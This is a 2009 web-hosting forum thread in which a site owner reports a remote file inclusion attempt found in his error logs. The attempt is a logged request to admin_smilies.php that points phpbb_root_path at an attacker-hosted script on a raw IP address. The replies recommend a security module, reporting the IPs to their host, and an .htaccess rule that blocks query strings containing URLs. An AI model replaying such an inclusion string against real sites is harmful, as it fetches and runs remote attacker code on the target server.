PHP Web Host - Quality Web Hosting For All PHP Applications Just Great Software
  Login or Register
 • Home • Downloads • Your Account • Forums • 

View next topic
View previous topic


Google
 
Web RavenPHPScripts (This Site)
Post new topic   Reply to topic
Author Message
gazj
Worker
Worker


Joined: Apr 28, 2006
Posts: 150
Location: doncaster england

PostPosted: Sun Sep 20, 2009 6:18 pm Reply with quote Back to top

i have an error log on my site to aid me in missing files images see who was trying what url and so on and i came accross these in my logs you have to take the spaces out as it wouldnt let me post

nunuke.co.uk/modules/Forums / admin/admin_smilies.php? phpbb_root_path = http :// 200.209.69.194 /bot / fx29id.txt ? ?

now if you visit
Only registered users can see links on this board!
Get registered or login to the forums!

you will see a list of hacking txt file tools does anybody know of anyway to getmy own back in someway i searched the ip and its in brazil but they are using another ip located on U.S hosting to act as the ip to visit my site i am not very clued up at what any of these files do but looking at one it looks like it trys to access the hosting info and grab passwords and hijack it and store txt files

im not worried about this find as my error log spits a 403 at them but what would it do if i had the error logging off?? who knows but i dont wonna find out
View user's profile Send private message Visit poster's website
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Sun Sep 20, 2009 9:11 pm Reply with quote Back to top

There are automated bot tools... lots are out there. I'm not sure what you want to do. These attempts should be blocked by NukeSentinel.

You can try and report those IPs to their host. Some of them will respond while others just won't.
View user's profile Send private message Visit poster's website
slackervaara
Worker
Worker


Joined: Aug 26, 2007
Posts: 234

PostPosted: Sun Sep 20, 2009 10:26 pm Reply with quote Back to top

It is cross scripting, which you can block also in .htaccess by this:

RewriteEngine On

RewriteCond %{QUERY_STRING} .*http:\/\/.* [OR]
RewriteCond %{QUERY_STRING} .*http%3A%2F%2F.*
Rewriterule ^.* - [F]
View user's profile Send private message
Display posts from previous:       
Post new topic   Reply to topic

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
Forums ©
 

All logos and trademarks in this site are property of their respective owner.
The comments are property of their posters, all the rest © 2002-2011 by Raven

You can syndicate our news using the file xml

CSE HTML Validator Helped Clean up This Page! [Valid RSS] valid RSS 2.0 Valid robots.txt Stop Spam Harvesters, Join Project Honey Pot

Website engines core code is © copyright by PHP-Nuke but has been heavily patched and modified by myself and others.
PHP-Nuke is a free software released under the GNU/GPL.


:: fisubice phpbb2 style by Daz :: PHP-Nuke theme by www.nukemods.com ::
:: fisubice Theme Modified by the RavenNuke™ Team ::

:: W3C CSS Compliance Validation :: W3C HTML 4.01 Transitional Compliance Validation ::

zerosum